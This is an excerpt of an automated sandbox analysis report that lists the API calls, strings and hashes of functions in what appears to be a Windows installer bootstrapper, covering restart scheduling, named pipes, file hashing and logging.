AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 000C46C6
GetLastError.KERNEL32 ref: 000C46D0
Sleep.KERNEL32(000003E8), ref: 000C470C
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 000C471D
GetLastError.KERNEL32 ref: 000C4727
CloseHandle.KERNEL32(?), ref: 000C477D

Strings

Failed to get process token., xrefs: 000C4656
engine.cpp, xrefs: 000C464C, 000C46A6, 000C46F4, 000C475E
Failed to get shutdown privilege LUID., xrefs: 000C46B0
SeShutdownPrivilege, xrefs: 000C466B
Failed to adjust token to add shutdown privileges., xrefs: 000C46FE
Failed to schedule restart., xrefs: 000C4768

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
API String ID: 2241679041-1583736410
Opcode ID: c81a0837a87e417c9b99555565614fdc5b442b56ecd94b97218b5c958f1f4df0
Instruction ID: 4b3756c79f29c2792ab2ad05695be24e748ddf4ca6aef36c05ad1fb005df9629
Opcode Fuzzy Hash: c81a0837a87e417c9b99555565614fdc5b442b56ecd94b97218b5c958f1f4df0
Instruction Fuzzy Hash: CF412A77E44236ABD7205BA58C9AFAF7AA8FB01750F01022DFE40B72C0D7A58C4086E1

Function 000D4EDF Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 165pipeCOMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 000D4F0D
GetLastError.KERNEL32(?,00000000,?,?,000C452F,?), ref: 000D4F16
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,000C452F,?), ref: 000D4FB8
GetLastError.KERNEL32(?,000C452F,?), ref: 000D4FC5
CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,000C452F), ref: 000D5040
GetLastError.KERNEL32(?,?,?,?,?,?,?,000C452F,?), ref: 000D504B
CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,000C452F,?), ref: 000D508B
LocalFree.KERNEL32(00000000,?,000C452F,?), ref: 000D50B9

Strings

D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 000D4F08
\\.\pipe\%ls.Cache, xrefs: 000D500C
Failed to create pipe: %ls, xrefs: 000D4FF6, 000D507C
Failed to create the security descriptor for the connection event and pipe., xrefs: 000D4F44
Failed to allocate full name of pipe: %ls, xrefs: 000D4F84
pipe.cpp, xrefs: 000D4F3A, 000D4FE9, 000D506F
\\.\pipe\%ls, xrefs: 000D4F6E
Failed to allocate full name of cache pipe: %ls, xrefs: 000D5022

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
API String ID: 1214480349-3253666091
Opcode ID: 5a4d3133b3796b24fa930747340921ae140c18293999ef1e122430cd85478ba4
Instruction ID: bdce03f2e07ed32f4abbf625a1801192b36529e42c6f5d9985d56fb96b8e07f5
Opcode Fuzzy Hash: 5a4d3133b3796b24fa930747340921ae140c18293999ef1e122430cd85478ba4
Instruction Fuzzy Hash: 2751AF72D41726BBDB219BA48C46FDEBAA4AF04B21F104136FD50B6291D3B55E808AE1

Function 000FFA62 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 173encryptionfileCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,000D9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 000FFAC7
GetLastError.KERNEL32 ref: 000FFAD1
CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 000FFB0E
GetLastError.KERNEL32 ref: 000FFB18
CryptHashData.ADVAPI32(?,?,?,00000000), ref: 000FFB5F
ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 000FFB83
GetLastError.KERNEL32 ref: 000FFB8D
CryptDestroyHash.ADVAPI32(00000000), ref: 000FFBCA
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 000FFBE1
GetLastError.KERNEL32 ref: 000FFBFC
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 000FFC34
GetLastError.KERNEL32 ref: 000FFC3E
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 000FFC77
GetLastError.KERNEL32 ref: 000FFC85

Strings

cryputil.cpp, xrefs: 000FFBB1

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
String ID: cryputil.cpp
API String ID: 3955742341-2185294990
Opcode ID: d3b870ae55d4834ccfeb8dfed4e57ba73d142f12b5686be8ad2d41c01aa30550
Instruction ID: 8198f8507056e4aec8babb22444640e13d3243c9697885abfb926fb65b434d50
Opcode Fuzzy Hash: d3b870ae55d4834ccfeb8dfed4e57ba73d142f12b5686be8ad2d41c01aa30550
Instruction Fuzzy Hash: 5D51C537D4023EABD7318A518D55BFB7AB4AF04751F0141B5BF88F6680E7B49D80AAE0

Function 000D9E9E Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 181COMMON

Download Yara Rule

Strings

Failed to move verified file to complete payload path: %ls, xrefs: 000DA06C
copying, xrefs: 000DA030, 000DA038
moving, xrefs: 000DA029
Failed to create unverified path., xrefs: 000D9F6E
Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 000D9FCB
Failed to transfer working path to unverified path for payload: %ls., xrefs: 000D9FA4
Failed to reset permissions on unverified cached payload: %ls, xrefs: 000D9FF1
Failed to get cached path for package with cache id: %ls, xrefs: 000D9EC8
Failed to concat complete cached path., xrefs: 000D9EF4

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
API String ID: 0-1289240508
Opcode ID: 4ca51ef27f8f6a47768193f674a5defb4ffb6c13b82091d2cbe09365a4b6f185
Instruction ID: 8894affe14e78579e72e294ed995fa2fdce07143f92c28babb10a0b0884e5d45
Opcode Fuzzy Hash: 4ca51ef27f8f6a47768193f674a5defb4ffb6c13b82091d2cbe09365a4b6f185
Instruction Fuzzy Hash: 47517231A44219FBDF236BA0CC42FDD7F76AF15700F144062F900B52A1E7729EA0ABA5

Function 000C62AA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 000C62F8
GetLastError.KERNEL32 ref: 000C6302

Strings

Failed to get OS info., xrefs: 000C6330
variable.cpp, xrefs: 000C6326
Failed to set variant value., xrefs: 000C6423

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastVersion
String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
API String ID: 305913169-1971907631
Opcode ID: 759b8653832dd4b59b883a0e3d95d41691bdbf1e18a2c0ab69ef3c23e0b74f2a
Instruction ID: 06a9b0ffb572632efcca085a41e81b6de3e383f8c6cfdf58b404659f4913c736
Opcode Fuzzy Hash: 759b8653832dd4b59b883a0e3d95d41691bdbf1e18a2c0ab69ef3c23e0b74f2a
Instruction Fuzzy Hash: 0041C2B2A04268ABDB309B59CC49FEF7BB8EB85710F00019EF545E7281D7759E81CB90

Function 000C6037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 000C6062
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 000C6076
GetLastError.KERNEL32 ref: 000C6088
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 000C60DC
GetLastError.KERNEL32 ref: 000C60E6

Strings

Failed to get the required buffer length for the Date., xrefs: 000C60AD
Failed to get the Date., xrefs: 000C610B
variable.cpp, xrefs: 000C60A3, 000C6101
Failed to allocate the buffer for the Date., xrefs: 000C60C4
Failed to set variant value., xrefs: 000C6124

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: DateErrorFormatLast$SystemTime
String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
API String ID: 2700948981-3682088697
Opcode ID: 6d4e2d5b746085e81dbd0281855ffbc7c917e62ef5c4cc3ca086b86068533009
Instruction ID: 472264f29998195310c691a0473fdab5d2cf14196f2d4227aacb99ea7d4269c9
Opcode Fuzzy Hash: 6d4e2d5b746085e81dbd0281855ffbc7c917e62ef5c4cc3ca086b86068533009
Instruction Fuzzy Hash: 7231AB32A4062A7BDB319BE9DC42FAF7BB4AF04710F154129FE40F7191D7A29D4046E1

Function 000FFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0012B5FC,00000000,?,?,?,?,000E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000FFEF4
GetCurrentProcessId.KERNEL32(00000000,?,000E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000FFF04
GetCurrentThreadId.KERNEL32 ref: 000FFF0D
GetLocalTime.KERNEL32(8007139F,?,000E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 000FFF23
LeaveCriticalSection.KERNEL32(0012B5FC,000E12CF,?,00000000,0000FDE9,?,000E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0010001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 000FFFC0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: 9482631958937e0d53e311942523c83c5a5205f9a53037cde64ae6956b5b4df2
Instruction ID: 233c01076f9ea9041b7b537c21e259a7575d50cf86a9e753678ef0c459ab6b41
Opcode Fuzzy Hash: 9482631958937e0d53e311942523c83c5a5205f9a53037cde64ae6956b5b4df2
Instruction Fuzzy Hash: 23419D32D0121AABDB219FA4DC44BBFB7B9EF08B51F044035FA40E6690D7748D91DBA0

Function 000D9B43 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 000D9BF2
lstrlenW.KERNEL32(?), ref: 000D9C19
FindNextFileW.KERNEL32(00000000,00000010), ref: 000D9C79
FindClose.KERNEL32(00000000), ref: 000D9C84

Part of subcall function 000C3CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 000C3D40
Part of subcall function 000C3CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 000C3D53

Strings

*.*, xrefs: 000D9BCC
.unverified, xrefs: 000D9B86

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: 931b91a6639c719ab52aa53f8ebb1046bb86a7e3ecce61876154deee36691481
Instruction ID: 9448e61f989a2b31b4d68dad4fe32e6e46dc634f1f07bf401881b5aea738816a
Opcode Fuzzy Hash: 931b91a6639c719ab52aa53f8ebb1046bb86a7e3ecce61876154deee36691481
Instruction Fuzzy Hash: 8641933091066CAECB61AB60DD49BEE77F8EF44301F4041E6E948E11A1EBB19EC4DF64

Function 0010887B Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 001088D0
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 001088E2

Strings

feclient.dll, xrefs: 001088AA
%04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 0010892D
%04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 001088B9
crypt32.dll, xrefs: 001088A0

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Time$InformationLocalSpecificSystemZone
String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
API String ID: 1772835396-1985132828
Opcode ID: 2ea9dc905a0711af547b4f68a5b92cd32dde37d0e257c7e937e63acaad43624e
Instruction ID: 21b20f14919bb1affac787f8494618406a940efe728a2f07eaefd2ef89e0b1c3
Opcode Fuzzy Hash: 2ea9dc905a0711af547b4f68a5b92cd32dde37d0e257c7e937e63acaad43624e
Instruction Fuzzy Hash: 9D21FA66900128EAD760DB99DC05EBFB3FCAB4C711F00855AF995D2180E778AA90D770

Function 000FAA0E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 000FAB54

Strings

1#SNAN, xrefs: 000FBD53
1#IND, xrefs: 000FBD4C
1#INF, xrefs: 000FBD61
1#QNAN, xrefs: 000FBD5A

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 11cbfa7e98de4a71bae087772bb366684118a5619375bb2d49e0826617c9dd55
Instruction ID: 8ce7976c41f32667820ef2201c60245f7d64b405ed6a5d5b6dd137bae0ffffd3
Opcode Fuzzy Hash: 11cbfa7e98de4a71bae087772bb366684118a5619375bb2d49e0826617c9dd55
Instruction Fuzzy Hash: 33C23771E0862C8BDB65CE28DD407EAB3F5EB89304F1441EAD50DE7641E778AE819F41

Function 000C61DF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 000C620F
GetLastError.KERNEL32 ref: 000C6219

Strings

Failed to get the user name., xrefs: 000C6242
variable.cpp, xrefs: 000C6238
Failed to set variant value., xrefs: 000C625E

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastNameUser
String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
API String ID: 2054405381-1522884404
Opcode ID: afaee01c00f6ca9f48a3ca8e5f354bb1b6552094457882c3c278ae86182b3ed8
Instruction ID: c631d0c6d78226fa22d2fae02bf5045afee13ff8e614c8cad3247bd3310616c7
Opcode Fuzzy Hash: afaee01c00f6ca9f48a3ca8e5f354bb1b6552094457882c3c278ae86182b3ed8
Instruction Fuzzy Hash: 41014932A007296BC7309B54DC05FAFB7A89F00720F004259FC40F7281DBB19D404AD4

Function 000FFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,001004F4,?,?,?,?,00000001), ref: 000FFE40
GetLastError.KERNEL32(?,001004F4,?,?,?,?,00000001,?,000C5616,?,?,00000000,?,?,000C5395,00000002), ref: 000FFE4C
LocalFree.KERNEL32(00000000,?,?,00000000,?,?,001004F4,?,?,?,?,00000001,?,000C5616,?,?), ref: 000FFEB5

Strings

logutil.cpp, xrefs: 000FFE6B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: logutil.cpp
API String ID: 1365068426-3545173039
Opcode ID: 93598e95c934e0828c3ce1ef28d1fe493c6bcba30c325df8e496685588fef7b8
Instruction ID: 86c8a465efa84503808b2d4104b266c3492e9216b86c822d659a9a5f829fe90b
Opcode Fuzzy Hash: 93598e95c934e0828c3ce1ef28d1fe493c6bcba30c325df8e496685588fef7b8
Instruction Fuzzy Hash: 52118F32A0012EEBDB319F949D05EFF7BA9EF54710F014069FE0496576D7718E60E6A0

Function 000E6B88 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000003,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000E6B32,00000000,00000003), ref: 000E6B9F
GetLastError.KERNEL32(?,000E6B32,00000000,00000003,00000000,?,?,?,?,?,?,?,?,?,000E6F28,?), ref: 000E6BA9

Strings

Failed to set service start type., xrefs: 000E6BD7
msuengine.cpp, xrefs: 000E6BCD

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ChangeConfigErrorLastService
String ID: Failed to set service start type.$msuengine.cpp
API String ID: 1456623077-1628545019
Opcode ID: 0f164cd0290917603ac29f920070a030131f6a0327c9435ade07596d112e23dc
Instruction ID: 4bc3e3485711385de0cf79d745887ce300d2e7fd34c7a5479e3a6938d7e9341a
Opcode Fuzzy Hash: 0f164cd0290917603ac29f920070a030131f6a0327c9435ade07596d112e23dc
Instruction Fuzzy Hash: 53F0EC3364913537C72126967C05FCF7E589F117B0B114325FD68FA2D0DB568D4081E0

Function 000F3C76 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 000F3D6E
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 000F3D78
UnhandledExceptionFilter.KERNEL32(80003CDD,?,?,?,?,?,?), ref: 000F3D85

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7e4b7066507082fb359d2ed0afb6bb331e223300cc582639e84fecf3efff6b84
Instruction ID: 2c66815b96e90a8440e869c26cf515bff86dd1febcf8172d21841c5ce76d6cac
Opcode Fuzzy Hash: 7e4b7066507082fb359d2ed0afb6bb331e223300cc582639e84fecf3efff6b84
Instruction Fuzzy Hash: 1431E17091122CABCB61DF65D9887D8BBB8BF08310F5041EAE90CA6251EB709F818F44

Function 000F7B87 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 000F7C51

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 8a3943693f1cbca187dc37f2ef4983f9ab7abb0215c272fc8e90ba818e2fd2be
Instruction ID: ca9d1c345ac04930b5bd693ffa4753a0553d64dac0ce2b1a5b69eb9b7defaa97
Opcode Fuzzy Hash: 8a3943693f1cbca187dc37f2ef4983f9ab7abb0215c272fc8e90ba818e2fd2be
Instruction Fuzzy Hash: 2F41477250421C6FCB249FB9CC89EBB77B8EB84314F50026CFA09D7581E6719E81DB90

Function 000FA560 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID:
String ID:
API String ID:
